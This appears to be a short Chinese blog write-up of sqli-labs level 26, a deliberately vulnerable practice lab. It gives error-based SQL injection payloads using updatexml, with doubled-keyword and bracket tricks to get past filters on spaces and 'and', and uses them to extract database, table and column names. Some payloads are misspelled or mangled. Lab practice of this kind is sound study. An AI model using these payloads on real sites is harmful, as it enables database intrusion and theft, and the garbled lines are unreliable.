sqli-labs(26)
2024-08-31 07:33:37
0X01
测试闭合 单引号报错 双引号不报错 ’闭合
构造语句 过滤了空格和and
?id=' anandd 1=1%23
?id='+anandd+1=1%23
百度一下
一去看源码 真的顶不住
那我们就别光想着正确的地方输入了 我们用报错注入
?id='||updatexml(1,concat(':',(select database())),1)||''='
0X02爆表名
but 好像不行
'||updatexml(1,concat(':',(select table_name from informatiom_schema.tables where table_schema='security' limit 0,1)),1)||''='
绕过
'||updatexml(1,concat('$',(select(group_concat(table_name))from(infoorrmation_schema.tables)where(table_schema='security'))),0)||''='
0X03爆破列名
?id=-%||updatexml(,concat(%%%,(select(group_concat(column_name))from(infoorrmation_schema.columns)where(table_name=%27users%))),)||%%=%
hint:group_concat(table_name)) 第一个括号是闭合select 之后的空格 第二个括号是闭合group_caoncat语法
加油学习 切记 学习之路 少就是多 慢就是快
最新文章
- 构建web应用示例
- Android之使用Volley框架在ListView中加载大量图片
- ssh 互通脚本
- jQuery触发<a>标签的点击事件后URL不跳转的解决办法
- Extjs4.2.1学习笔记[更新]
- [TYVJ] P1026 犁田机器人
- [置顶] Android EditText/TextView使用SpannableString显示复合文本
- 用SQL将查询出来的多列的值拼接成一个字符串【转载】
- 企业架构研究总结(30)——TOGAF架构内容框架之内容元模型(上)
- Java序列化机制和原理及自己的理解
- mac下chrome 长截图(不使用插件)
- spring-boot logback配置
- Why does Delphi XE7 IDE hangs and fails on out of memory exception?
- 解决eclipse修改后台代码ctrl+s总是【自动重启服务器】问题
- Math对象属性
- Visual Studio配置C/C++-PostgreSQL(9.6.3)开发环境(ZT)
- [ SHELL编程 ] 数组、关联数组和awk数组
- ajax post 请求 ,java端使用 request.getParameter 获取不到数据问题
- CentOS下yum安装mcrypt错误:No package php-mcrypt available.解决方法
- atom中vue高亮支持emmet语法